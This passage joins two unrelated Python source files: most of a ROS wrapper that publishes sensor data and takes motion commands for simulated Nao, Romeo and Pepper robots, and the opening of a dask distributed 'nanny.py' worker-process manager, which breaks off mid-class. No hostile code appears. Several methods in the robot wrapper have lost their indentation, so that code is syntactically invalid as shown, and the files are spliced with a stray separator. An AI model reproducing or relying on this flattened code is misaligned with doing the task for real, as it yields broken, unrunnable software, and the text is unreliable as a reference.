        elif isinstance(self.robot, RomeoVirtual):
            robot_name = "romeo"
        else:
            raise pybullet.error(
                "Unknown robot type, wont set robot description")

        # The URDF is shipped with the naoqi_driver ROS package.
        package_path = roslib.packages.get_pkg_dir("naoqi_driver")
        urdf_path = package_path + "/share/urdf/" + robot_name + ".urdf"

        with open(urdf_path, 'r') as file:
            robot_description = file.read()

        rospy.set_param("/robot_description", robot_description)

    except IOError as e:
        raise pybullet.error(
            "Could not retrieve robot descrition: " + str(e))

    # Launch the robot state publisher
    robot_state_publisher = roslaunch.core.Node(
        "robot_state_publisher",
        "robot_state_publisher")
    self.roslauncher = roslaunch.scriptapi.ROSLaunch()
    self.roslauncher.start()
    self.roslauncher.launch(robot_state_publisher)

    # Initialize the ROS publisher and subscribers
    self._initPublishers()
    self._initSubscribers()

    # Launch the wrapper's main loop
    self._wrapper_termination = False
    self.spin_thread = Thread(target=self._spin)
    self.spin_thread.start()
def _initPublishers(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Initializes the ROS publishers
"""
raise NotImplementedError
def _initSubscribers(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Initializes the ROS subscribers
"""
raise NotImplementedError
def _spin(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Designed to emulate a ROS spin method
"""
raise NotImplementedError
def _broadcastOdometry(self, odometry_publisher):
    """
    INTERNAL METHOD, publishes the robot's planar pose as a TF transform
    (odom -> base_link) and its base velocity as an Odometry message.

    Parameters:
        odometry_publisher - The ROS publisher for the odometry message
    """
    pos_x, pos_y, yaw = self.robot.getPosition()

    # Broadcast the odom -> base_link transform first.
    tf_msg = TransformStamped()
    tf_msg.header.frame_id = "odom"
    tf_msg.child_frame_id = "base_link"
    tf_msg.header.stamp = rospy.get_rostime()
    tf_msg.transform.translation.x = pos_x
    tf_msg.transform.translation.y = pos_y
    tf_msg.transform.translation.z = 0
    quat = pybullet.getQuaternionFromEuler([0, 0, yaw])
    (tf_msg.transform.rotation.x,
     tf_msg.transform.rotation.y,
     tf_msg.transform.rotation.z,
     tf_msg.transform.rotation.w) = quat
    self.transform_broadcaster.sendTransform(tf_msg)

    # Then publish the odometry message with the same pose and the
    # current base velocity from the physics engine.
    odom = Odometry()
    odom.header.stamp = rospy.get_rostime()
    odom.header.frame_id = "odom"
    odom.child_frame_id = "base_link"
    odom.pose.pose.position.x = pos_x
    odom.pose.pose.position.y = pos_y
    odom.pose.pose.position.z = 0.0
    odom.pose.pose.orientation = tf_msg.transform.rotation
    linear, angular = pybullet.getBaseVelocity(
        self.robot.getRobotModel(),
        self.robot.getPhysicsClientId())
    odom.twist.twist.linear.x = linear[0]
    odom.twist.twist.linear.y = linear[1]
    odom.twist.twist.angular.z = angular[2]
    odometry_publisher.publish(odom)
def _broadcastCamera(self, camera, image_publisher, info_publisher):
"""
INTERNAL METHOD, computes the image message and the info message of the
given camera and publishes them into the ROS framework
Parameters:
camera - The camera used for broadcasting
image_publisher - The ROS publisher for the Image message,
corresponding to the image delivered by the active camera
info_publisher - The ROS publisher for the CameraInfo message,
corresponding to the parameters of the active camera
"""
try:
frame = camera.getFrame()
assert frame is not None
# Fill the camera info message
info_msg = CameraInfo()
info_msg.distortion_model = "plumb_bob"
info_msg.header.frame_id = camera.getCameraLink().getName()
info_msg.width = camera.getResolution().width
info_msg.height = camera.getResolution().height
info_msg.D = [0.0, 0.0, 0.0, 0.0, 0.0]
info_msg.K = camera._getCameraIntrinsics()
info_msg.R = [1, 0, 0, 0, 1, 0, 0, 0, 1]
info_msg.P = list(info_msg.K)
info_msg.P.insert(3, 0.0)
info_msg.P.insert(7, 0.0)
info_msg.P.append(0.0)
# Fill the image message
image_msg = self.image_bridge.cv2_to_imgmsg(frame)
image_msg.header.frame_id = camera.getCameraLink().getName()
# Check if the retrieved image is RGB or a depth image
if isinstance(camera, CameraDepth):
image_msg.encoding = "16UC1"
else:
image_msg.encoding = "bgr8"
# Publish the image and the camera info
image_publisher.publish(image_msg)
info_publisher.publish(info_msg)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher, extra_joints=None):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints
extra_joints - A dict, describing extra joints to be published. The
dict should respect the following syntax:
{"joint_name": joint_value, ...}
"""
msg_joint_state = JointState()
msg_joint_state.header = Header()
msg_joint_state.header.stamp = rospy.get_rostime()
msg_joint_state.name = list(self.robot.joint_dict)
msg_joint_state.position = self.robot.getAnglesPosition(
msg_joint_state.name)
try:
assert isinstance(extra_joints, dict)
for name, value in extra_joints.items():
msg_joint_state.name += [name]
msg_joint_state.position += [value]
except AssertionError:
pass
joint_state_publisher.publish(msg_joint_state)
def _jointAnglesCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
/joint_angles topic
Parameters:
msg - a ROS message containing a pose stamped with a speed
associated to it. The type of the message is the following:
naoqi_bridge_msgs::JointAnglesWithSpeed. That type can be found in
the ros naoqi software stack
"""
joint_list = msg.joint_names
position_list = list(msg.joint_angles)
# If the "non official" driver (softbankrobotics-research fork) is
# used, will try to detect if multiple speeds have been provided. If
# not, or if the "official" driver is used, the speed attribute of the
# message will be used
try:
assert not OFFICIAL_DRIVER
if len(msg.speeds) != 0:
velocity = list(msg.speeds)
else:
velocity = msg.speed
except AssertionError:
velocity = msg.speed
self.robot.setAngles(joint_list, position_list, velocity)
class NaoRosWrapper(RosWrapper):
    """
    Class describing a ROS wrapper for the virtual model of Nao, inheriting
    from the RosWrapper class
    """

    def __init__(self):
        """
        Constructor
        """
        RosWrapper.__init__(self)

    def launchWrapper(self, virtual_nao, ros_namespace, frequency=200):
        """
        Launches the ROS wrapper for the virtual_nao instance

        Parameters:
            virtual_nao - The instance of the simulated model
            ros_namespace - The ROS namespace to be added before the ROS
            topics advertised and subscribed
            frequency - The frequency of the ROS rate that will be used to
            pace the wrapper's main loop
        """
        RosWrapper.launchWrapper(
            self,
            virtual_nao,
            ros_namespace,
            frequency)

    def _initPublishers(self):
        """
        INTERNAL METHOD, initializes the ROS publishers
        """
        # Top (front) camera image and intrinsics
        self.front_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/front/image_raw',
            Image,
            queue_size=10)
        self.front_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/front/camera_info',
            CameraInfo,
            queue_size=10)
        # Bottom camera image and intrinsics
        self.bottom_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/bottom/image_raw',
            Image,
            queue_size=10)
        self.bottom_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/bottom/camera_info',
            CameraInfo,
            queue_size=10)
        # NOTE(review): /joint_states is advertised in the global namespace,
        # and 'odom' relative to the node, unlike the namespaced camera
        # topics above - confirm this asymmetry is intentional
        self.joint_states_pub = rospy.Publisher(
            '/joint_states',
            JointState,
            queue_size=10)
        self.odom_pub = rospy.Publisher(
            'odom',
            Odometry,
            queue_size=10)

    def _initSubscribers(self):
        """
        INTERNAL METHOD, initializes the ROS subscribers
        """
        rospy.Subscriber(
            '/joint_angles',
            JointAnglesWithSpeed,
            self._jointAnglesCallback)

    def _broadcastCamera(self):
        """
        INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper.
        Broadcasts only the cameras that are currently active
        """
        if self.robot.camera_dict[NaoVirtual.ID_CAMERA_TOP].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[NaoVirtual.ID_CAMERA_TOP],
                self.front_cam_pub,
                self.front_info_pub)
        if self.robot.camera_dict[NaoVirtual.ID_CAMERA_BOTTOM].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[NaoVirtual.ID_CAMERA_BOTTOM],
                self.bottom_cam_pub,
                self.bottom_info_pub)

    def _broadcastJointState(self, joint_state_publisher):
        """
        INTERNAL METHOD, publishes the state of the robot's joints into the
        ROS framework, overloading @_broadcastJointState in RosWrapper

        Parameters:
            joint_state_publisher - The ROS publisher for the JointState
            message, describing the state of the robot's joints (for API
            consistency)
        """
        RosWrapper._broadcastJointState(self, joint_state_publisher)

    def _spin(self):
        """
        INTERNAL METHOD, designed to emulate a ROS spin method: broadcasts
        joint states, odometry and camera frames at self.frequency until the
        wrapper is terminated or an error occurs
        """
        rate = rospy.Rate(self.frequency)

        try:
            while not self._wrapper_termination:
                rate.sleep()
                self._broadcastJointState(self.joint_states_pub)
                self._broadcastOdometry(self.odom_pub)
                self._broadcastCamera()
        # Broad catch is the loop's shutdown path: any error stops the
        # wrapper and is reported on stdout rather than killing the thread
        # silently
        except Exception as e:
            print("Stopping the ROS wrapper: " + str(e))
class RomeoRosWrapper(RosWrapper):
    """
    Class describing a ROS wrapper for the virtual model of Romeo, inheriting
    from the RosWrapper class
    """

    def __init__(self):
        """
        Constructor
        """
        RosWrapper.__init__(self)

    def launchWrapper(self, virtual_romeo, ros_namespace, frequency=200):
        """
        Launches the ROS wrapper for the virtual_romeo instance

        Parameters:
            virtual_romeo - The instance of the simulated model
            ros_namespace - The ROS namespace to be added before the ROS
            topics advertised and subscribed
            frequency - The frequency of the ROS rate that will be used to
            pace the wrapper's main loop
        """
        RosWrapper.launchWrapper(
            self,
            virtual_romeo,
            ros_namespace,
            frequency)

    def _initPublishers(self):
        """
        INTERNAL METHOD, initializes the ROS publishers (stereo RGB pair plus
        a depth camera, joint states and odometry)
        """
        self.right_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/right/image_raw',
            Image,
            queue_size=10)
        self.right_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/right/camera_info',
            CameraInfo,
            queue_size=10)
        self.left_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/left/image_raw',
            Image,
            queue_size=10)
        self.left_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/left/camera_info',
            CameraInfo,
            queue_size=10)
        self.depth_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/depth/image_raw',
            Image,
            queue_size=10)
        self.depth_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/depth/camera_info',
            CameraInfo,
            queue_size=10)
        # NOTE(review): /joint_states is advertised in the global namespace,
        # unlike the namespaced camera topics - confirm this is intentional
        self.joint_states_pub = rospy.Publisher(
            '/joint_states',
            JointState,
            queue_size=10)
        self.odom_pub = rospy.Publisher(
            'odom',
            Odometry,
            queue_size=10)

    def _initSubscribers(self):
        """
        INTERNAL METHOD, initializes the ROS subscribers
        """
        rospy.Subscriber(
            '/joint_angles',
            JointAnglesWithSpeed,
            self._jointAnglesCallback)

    def _broadcastCamera(self):
        """
        INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper.
        Broadcasts only the cameras that are currently active
        """
        if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_RIGHT].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[RomeoVirtual.ID_CAMERA_RIGHT],
                self.right_cam_pub,
                self.right_info_pub)
        if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_LEFT].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[RomeoVirtual.ID_CAMERA_LEFT],
                self.left_cam_pub,
                self.left_info_pub)
        if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_DEPTH].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[RomeoVirtual.ID_CAMERA_DEPTH],
                self.depth_cam_pub,
                self.depth_info_pub)

    def _broadcastJointState(self, joint_state_publisher):
        """
        INTERNAL METHOD, publishes the state of the robot's joints into the
        ROS framework, overloading @_broadcastJointState in RosWrapper

        Parameters:
            joint_state_publisher - The ROS publisher for the JointState
            message, describing the state of the robot's joints (for API
            consistency)
        """
        RosWrapper._broadcastJointState(self, joint_state_publisher)

    def _spin(self):
        """
        INTERNAL METHOD, designed to emulate a ROS spin method: broadcasts
        joint states, odometry and camera frames at self.frequency until the
        wrapper is terminated or an error occurs
        """
        rate = rospy.Rate(self.frequency)

        try:
            while not self._wrapper_termination:
                rate.sleep()
                self._broadcastJointState(self.joint_states_pub)
                self._broadcastOdometry(self.odom_pub)
                self._broadcastCamera()
        # Broad catch is the loop's shutdown path: any error stops the
        # wrapper and is reported on stdout
        except Exception as e:
            print("Stopping the ROS wrapper: " + str(e))
class PepperRosWrapper(RosWrapper):
    """
    Class describing a ROS wrapper for the virtual model of Pepper, inheriting
    from the RosWrapper class
    """

    def __init__(self):
        """
        Constructor
        """
        RosWrapper.__init__(self)

    def launchWrapper(self, virtual_pepper, ros_namespace, frequency=200):
        """
        Launches the ROS wrapper for the virtual_pepper instance

        Parameters:
            virtual_pepper - The instance of the simulated model
            ros_namespace - The ROS namespace to be added before the ROS
            topics advertised and subscribed
            frequency - The frequency of the ROS rate that will be used to
            pace the wrapper's main loop
        """
        RosWrapper.launchWrapper(
            self,
            virtual_pepper,
            ros_namespace,
            frequency)

    def _initPublishers(self):
        """
        INTERNAL METHOD, initializes the ROS publishers (front/bottom/depth
        cameras, laser scan, joint states and odometry)
        """
        self.front_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/front/image_raw',
            Image,
            queue_size=10)
        self.front_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/front/camera_info',
            CameraInfo,
            queue_size=10)
        self.bottom_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/bottom/image_raw',
            Image,
            queue_size=10)
        self.bottom_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/bottom/camera_info',
            CameraInfo,
            queue_size=10)
        self.depth_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/depth/image_raw',
            Image,
            queue_size=10)
        self.depth_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/depth/camera_info',
            CameraInfo,
            queue_size=10)
        self.laser_pub = rospy.Publisher(
            self.ros_namespace + "/laser",
            LaserScan,
            queue_size=10)
        # NOTE(review): /joint_states is global and the odometry topic mimics
        # the real robot's /naoqi_driver/odom - confirm both are intentional
        self.joint_states_pub = rospy.Publisher(
            '/joint_states',
            JointState,
            queue_size=10)
        self.odom_pub = rospy.Publisher(
            '/naoqi_driver/odom',
            Odometry,
            queue_size=10)

    def _initSubscribers(self):
        """
        INTERNAL METHOD, initializes the ROS subscribers (joint commands,
        velocity commands and move-to goals / cancellations)
        """
        rospy.Subscriber(
            '/joint_angles',
            JointAnglesWithSpeed,
            self._jointAnglesCallback)
        rospy.Subscriber(
            '/cmd_vel',
            Twist,
            self._velocityCallback)
        rospy.Subscriber(
            '/move_base_simple/goal',
            MovetoPose,
            self._moveToCallback)
        rospy.Subscriber(
            '/move_base_simple/cancel',
            Empty,
            self._killMoveCallback)

    def _broadcastLasers(self, laser_publisher):
        """
        INTERNAL METHOD, publishes the laser values in the ROS framework

        Parameters:
            laser_publisher - The ROS publisher for the LaserScan message,
            corresponding to the laser info of the pepper robot (for API
            consistency)
        """
        # Nothing to publish while the laser manager is inactive
        if not self.robot.laser_manager.isActive():
            return

        scan = LaserScan()
        scan.header.stamp = rospy.get_rostime()
        scan.header.frame_id = "base_footprint"
        # -120 degres, 120 degres
        scan.angle_min = -2.0944
        scan.angle_max = 2.0944

        # 240 degres FoV, 61 points (blind zones inc): 15 points per laser,
        # plus 8 filler points for each of the two blind zones between them
        scan.angle_increment = (2 * 2.0944) / (15.0 + 15.0 + 15.0 + 8.0 + 8.0)

        # Detection ranges for the lasers in meters, 0.1 to 3.0 meters
        scan.range_min = 0.1
        scan.range_max = 3.0

        # Fill the lasers information. Readings are reversed so the ranges
        # run from angle_min (right side) to angle_max (left side); the -1
        # fillers stand for the blind zones between the three lasers
        right_scan = self.robot.getRightLaserValue()
        front_scan = self.robot.getFrontLaserValue()
        left_scan = self.robot.getLeftLaserValue()

        if isinstance(right_scan, list):
            scan.ranges.extend(list(reversed(right_scan)))
            scan.ranges.extend([-1]*8)
        if isinstance(front_scan, list):
            scan.ranges.extend(list(reversed(front_scan)))
            scan.ranges.extend([-1]*8)
        if isinstance(left_scan, list):
            scan.ranges.extend(list(reversed(left_scan)))

        laser_publisher.publish(scan)

    def _broadcastCamera(self):
        """
        INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper.
        Broadcasts only the cameras that are currently active
        """
        if self.robot.camera_dict[PepperVirtual.ID_CAMERA_TOP].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[PepperVirtual.ID_CAMERA_TOP],
                self.front_cam_pub,
                self.front_info_pub)
        if self.robot.camera_dict[PepperVirtual.ID_CAMERA_BOTTOM].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[PepperVirtual.ID_CAMERA_BOTTOM],
                self.bottom_cam_pub,
                self.bottom_info_pub)
        if self.robot.camera_dict[PepperVirtual.ID_CAMERA_DEPTH].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[PepperVirtual.ID_CAMERA_DEPTH],
                self.depth_cam_pub,
                self.depth_info_pub)

    def _broadcastJointState(self, joint_state_publisher):
        """
        INTERNAL METHOD, publishes the state of the robot's joints into the
        ROS framework, overloading @_broadcastJointState in RosWrapper

        Parameters:
            joint_state_publisher - The ROS publisher for the JointState
            message, describing the state of the robot's joints (for API
            consistency)
        """
        # The base wheels are not part of joint_dict; publish them with a
        # fixed zero position so downstream consumers see a complete state
        RosWrapper._broadcastJointState(
            self,
            joint_state_publisher,
            extra_joints={"WheelFL": 0.0, "WheelFR": 0.0, "WheelB": 0.0})

    def _velocityCallback(self, msg):
        """
        INTERNAL METHOD, callback triggered when a message is received on the
        /cmd_vel topic

        Parameters:
            msg - a ROS message containing a Twist command
        """
        self.robot.move(msg.linear.x, msg.linear.y, msg.angular.z)

    def _moveToCallback(self, msg):
        """
        INTERNAL METHOD, callback triggered when a message is received on the
        '/move_base_simple/goal' topic. It allows to move the robot's base

        Parameters:
            msg - a ROS message containing a pose stamped with a speed, or a
            simple pose stamped (depending on which version of the
            naoqi_driver is used, the "official" one from ros-naoqi or the
            "non official" softbankrobotics-research fork). The type of the
            message is the following: geometry_msgs::PoseStamped for the
            "official", naoqi_bridge_msgs::PoseStampedWithSpeed for the
            "non-official". An alias is given to the message type: MovetoPose
        """
        if OFFICIAL_DRIVER:
            pose = msg.pose
            frame = 0
            frame_id = msg.header.frame_id
            speed = None
        else:
            pose = msg.pose_stamped.pose
            frame = msg.referenceFrame
            frame_id = msg.pose_stamped.header.frame_id
            # Scale the requested percentage into the controller's velocity
            # range
            speed = msg.speed_percentage *\
                PepperBaseController.MAX_LINEAR_VELOCITY +\
                PepperBaseController.MIN_LINEAR_VELOCITY

        # Only derive the frame from frame_id when the message did not
        # already carry a valid reference frame.
        # NOTE(review): this assert/except idiom is stripped under python -O,
        # in which case frame_id always overrides the provided frame -
        # consider an explicit `if frame not in (...)` check instead
        try:
            assert frame not in [
                PepperVirtual.FRAME_ROBOT,
                PepperVirtual.FRAME_WORLD]

            if frame_id == "odom":
                frame = PepperVirtual.FRAME_WORLD
            elif frame_id == "base_footprint":
                frame = PepperVirtual.FRAME_ROBOT
            else:
                raise pybullet.error(
                    "Incorrect reference frame for move_base_simple, please "
                    "modify the content of your message")

        except AssertionError:
            pass

        x = pose.position.x
        y = pose.position.y
        # Extract the yaw component of the goal orientation
        theta = pybullet.getEulerFromQuaternion([
            pose.orientation.x,
            pose.orientation.y,
            pose.orientation.z,
            pose.orientation.w])[-1]
        self.robot.moveTo(
            x,
            y,
            theta,
            frame=frame,
            speed=speed,
            _async=True)

    def _killMoveCallback(self, msg):
        """
        INTERNAL METHOD, callback triggered when a message is received on the
        '/move_base_simple/cancel' topic. This callback is used to stop the
        robot's base from moving

        Parameters:
            msg - an empty ROS message, with the Empty type
        """
        # An async moveTo to the current frame origin with no displacement
        # interrupts any ongoing motion
        self.robot.moveTo(0, 0, 0, _async=True)

    def _spin(self):
        """
        INTERNAL METHOD, designed to emulate a ROS spin method: broadcasts
        joint states, odometry, lasers and camera frames at self.frequency
        until the wrapper is terminated or an error occurs
        """
        rate = rospy.Rate(self.frequency)

        try:
            while not self._wrapper_termination:
                rate.sleep()
                self._broadcastJointState(self.joint_states_pub)
                self._broadcastOdometry(self.odom_pub)
                self._broadcastLasers(self.laser_pub)
                self._broadcastCamera()
        # Broad catch is the loop's shutdown path: any error stops the
        # wrapper and is reported on stdout
        except Exception as e:
            print("Stopping the ROS wrapper: " + str(e))
|
nanny.py | from __future__ import print_function, division, absolute_import
from datetime import timedelta
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
import uuid
import dask
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError
from tornado.locks import Event
from .comm import get_address_host, get_local_address_for, unparse_host_port
from .core import rpc, RPCClosed, CommClosedError, coerce_to_address
from .metrics import time
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (get_ip, mp_context, silence_logging, json_load_robust,
PeriodicCallback)
from .worker import _ncores, run, parse_memory_limit, Worker
# Module-level logger, named after this module
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
    """ A process to manage worker processes

    The nanny spins up Worker processes, watches them, and kills or restarts
    them as necessary.
    """
    process = None
    status = None

    def __init__(self, scheduler_ip=None, scheduler_port=None,
                 scheduler_file=None, worker_port=0,
                 ncores=None, loop=None, local_dir=None, services=None,
                 name=None, memory_limit='auto', reconnect=True,
                 validate=False, quiet=False, resources=None, silence_logs=None,
                 death_timeout=None, preload=(), preload_argv=(), security=None,
                 contact_address=None, listen_address=None, worker_class=None,
                 **kwargs):
        # NOTE: preload_argv defaults to an immutable tuple; the previous
        # mutable [] default was a single list shared by every Nanny instance
        # Resolve the scheduler address, in decreasing order of precedence:
        # explicit scheduler file, dask config, then scheduler_ip[/port]
        if scheduler_file:
            cfg = json_load_robust(scheduler_file)
            self.scheduler_addr = cfg['address']
        elif scheduler_ip is None and dask.config.get('scheduler-address'):
            self.scheduler_addr = dask.config.get('scheduler-address')
        elif scheduler_port is None:
            self.scheduler_addr = coerce_to_address(scheduler_ip)
        else:
            self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
        self._given_worker_port = worker_port
        self.ncores = ncores or _ncores
        self.reconnect = reconnect
        self.validate = validate
        self.resources = resources
        self.death_timeout = death_timeout
        self.preload = preload
        self.preload_argv = preload_argv
        self.Worker = Worker if worker_class is None else worker_class
        self.contact_address = contact_address
        # Fraction of memory_limit above which the worker process is killed
        self.memory_terminate_fraction = dask.config.get('distributed.worker.memory.terminate')

        self.security = security or Security()
        assert isinstance(self.security, Security)
        self.connection_args = self.security.get_connection_args('worker')
        self.listen_args = self.security.get_listen_args('worker')

        self.local_dir = local_dir

        self.loop = loop or IOLoop.current()
        self.scheduler = rpc(self.scheduler_addr, connection_args=self.connection_args)
        self.services = services
        self.name = name
        self.quiet = quiet
        # When True, a dead worker process is respawned automatically
        self.auto_restart = True

        self.memory_limit = parse_memory_limit(memory_limit, self.ncores)

        if silence_logs:
            silence_logging(level=silence_logs)
        self.silence_logs = silence_logs

        handlers = {'instantiate': self.instantiate,
                    'kill': self.kill,
                    'restart': self.restart,
                    # cannot call it 'close' on the rpc side for naming conflict
                    'terminate': self._close,
                    'run': self.run}

        super(Nanny, self).__init__(handlers, io_loop=self.loop,
                                    connection_args=self.connection_args,
                                    **kwargs)

        if self.memory_limit:
            # Poll worker memory every 100ms
            pc = PeriodicCallback(self.memory_monitor, 100, io_loop=self.loop)
            self.periodic_callbacks['memory'] = pc

        self._listen_address = listen_address
        self.status = 'init'

    def __repr__(self):
        return "<Nanny: %s, threads: %d>" % (self.worker_address, self.ncores)

    @gen.coroutine
    def _unregister(self, timeout=10):
        """Tell the scheduler to forget the managed worker, best effort.

        Timeouts and connection errors are deliberately swallowed: the
        scheduler may already be gone during shutdown.
        """
        if self.process is None:
            return
        worker_address = self.process.worker_address
        if worker_address is None:
            return

        allowed_errors = (gen.TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
        try:
            # Use the captured worker_address (validated non-None above)
            # rather than re-reading the property, which may change
            yield gen.with_timeout(timedelta(seconds=timeout),
                                   self.scheduler.unregister(address=worker_address),
                                   quiet_exceptions=allowed_errors)
        except allowed_errors:
            pass

    @property
    def worker_address(self):
        """Address of the managed worker, or None while no process exists."""
        return None if self.process is None else self.process.worker_address

    @property
    def worker_dir(self):
        """Local directory of the managed worker, or None if no process."""
        return None if self.process is None else self.process.worker_dir

    @gen.coroutine
    def _start(self, addr_or_port=0):
        """ Start nanny, start local process, start watching """

        # XXX Factor this out
        if not addr_or_port:
            # Default address is the required one to reach the scheduler
            self.listen(get_local_address_for(self.scheduler.address),
                        listen_args=self.listen_args)
            self.ip = get_address_host(self.address)
        elif isinstance(addr_or_port, int):
            # addr_or_port is an integer => assume TCP
            self.ip = get_ip(
                get_address_host(self.scheduler.address)
            )
            self.listen((self.ip, addr_or_port),
                        listen_args=self.listen_args)
        else:
            self.listen(addr_or_port, listen_args=self.listen_args)
            self.ip = get_address_host(self.address)

        logger.info(' Start Nanny at: %r', self.address)
        response = yield self.instantiate()
        if response == 'running':
            assert self.worker_address
            self.status = 'running'
        else:
            # Worker failed to come up: tear the nanny down again
            yield self._close()

        self.start_periodic_callbacks()

    def start(self, addr_or_port=0):
        """Schedule _start on the event loop (non-blocking entry point)."""
        self.loop.add_callback(self._start, addr_or_port)

    @gen.coroutine
    def kill(self, comm=None, timeout=2):
        """ Kill the local worker process

        Blocks until both the process is down and the scheduler is properly
        informed
        """
        self.auto_restart = False
        if self.process is None:
            raise gen.Return('OK')

        # Budget 80% of the deadline for the process kill, the rest for
        # unregistering with the scheduler
        deadline = self.loop.time() + timeout
        yield self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
        yield self._unregister(deadline - self.loop.time())

    @gen.coroutine
    def instantiate(self, comm=None):
        """ Start a local worker process

        Blocks until the process is up and the scheduler is properly informed
        """
        if self._listen_address:
            start_arg = self._listen_address
        else:
            host = self.listener.bound_address[0]
            start_arg = self.listener.prefix + unparse_host_port(host,
                                                                 self._given_worker_port)

        if self.process is None:
            self.process = WorkerProcess(
                worker_args=(self.scheduler_addr,),
                worker_kwargs=dict(ncores=self.ncores,
                                   local_dir=self.local_dir,
                                   services=self.services,
                                   service_ports={'nanny': self.port},
                                   name=self.name,
                                   memory_limit=self.memory_limit,
                                   reconnect=self.reconnect,
                                   resources=self.resources,
                                   validate=self.validate,
                                   silence_logs=self.silence_logs,
                                   death_timeout=self.death_timeout,
                                   preload=self.preload,
                                   preload_argv=self.preload_argv,
                                   security=self.security,
                                   contact_address=self.contact_address),
                worker_start_args=(start_arg,),
                silence_logs=self.silence_logs,
                on_exit=self._on_exit,
                worker=self.Worker
            )

        self.auto_restart = True
        if self.death_timeout:
            try:
                result = yield gen.with_timeout(
                    timedelta(seconds=self.death_timeout),
                    self.process.start()
                )
            except gen.TimeoutError:
                yield self._close(timeout=self.death_timeout)
                raise gen.Return('timed out')
        else:
            result = yield self.process.start()
        raise gen.Return(result)

    @gen.coroutine
    def restart(self, comm=None, timeout=2, executor_wait=True):
        """Kill and re-instantiate the worker, bounded by *timeout* seconds."""
        start = time()

        @gen.coroutine
        def _():
            if self.process is not None:
                yield self.kill()
                yield self.instantiate()

        try:
            yield gen.with_timeout(timedelta(seconds=timeout), _())
        except gen.TimeoutError:
            logger.error("Restart timed out, returning before finished")
            raise gen.Return('timed out')
        else:
            raise gen.Return('OK')

    def memory_monitor(self):
        """ Track worker's memory. Restart if it goes above terminate fraction """
        if self.status != 'running':
            return
        process = self.process.process
        if process is None:
            return
        try:
            proc = psutil.Process(process.pid)
        except psutil.NoSuchProcess:
            return
        memory = proc.memory_info().rss
        frac = memory / self.memory_limit

        if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
            logger.warning("Worker exceeded %d%% memory budget. Restarting",
                           100 * self.memory_terminate_fraction)
            # _on_exit (via WorkerProcess) restarts the worker afterwards
            process.terminate()

    def is_alive(self):
        """Return True when a worker process exists and is running."""
        return self.process is not None and self.process.status == 'running'

    def run(self, *args, **kwargs):
        """Run an arbitrary function on this nanny (rpc handler)."""
        return run(self, *args, **kwargs)

    @gen.coroutine
    def _on_exit(self, exitcode):
        """Handle worker process death: unregister, then maybe restart."""
        if self.status not in ('closing', 'closed'):
            try:
                yield self.scheduler.unregister(address=self.worker_address)
            except (EnvironmentError, CommClosedError):
                if not self.reconnect:
                    yield self._close()
                    return
        try:
            if self.status not in ('closing', 'closed'):
                if self.auto_restart:
                    logger.warning("Restarting worker")
                    yield self.instantiate()
        except Exception:
            logger.error("Failed to restart worker after its process exited",
                         exc_info=True)

    @property
    def pid(self):
        """PID of the worker process, or None when no process exists."""
        return self.process and self.process.pid

    @gen.coroutine
    def _close(self, comm=None, timeout=5, report=None):
        """
        Close the worker process, stop all comms.
        """
        if self.status in ('closing', 'closed'):
            raise gen.Return('OK')
        self.status = 'closing'
        logger.info("Closing Nanny at %r", self.address)
        self.stop()
        try:
            if self.process is not None:
                yield self.kill(timeout=timeout)
        except Exception:
            # Best effort: the process may already be dead
            pass
        self.process = None
        self.rpc.close()
        self.scheduler.close_rpc()
        self.status = 'closed'
        raise gen.Return('OK')
class WorkerProcess(object):
    """Manage the lifecycle of a single Worker subprocess for a Nanny.

    Tracks a status machine ('init' -> 'starting' -> 'running' ->
    'stopping' -> 'stopped') and communicates with the child through two
    multiprocessing queues: init_result_q (child -> parent startup result)
    and child_stop_q (parent -> child stop request).
    """

    def __init__(self, worker_args, worker_kwargs, worker_start_args,
                 silence_logs, on_exit, worker):
        self.status = 'init'
        self.silence_logs = silence_logs
        self.worker_args = worker_args
        self.worker_kwargs = worker_kwargs
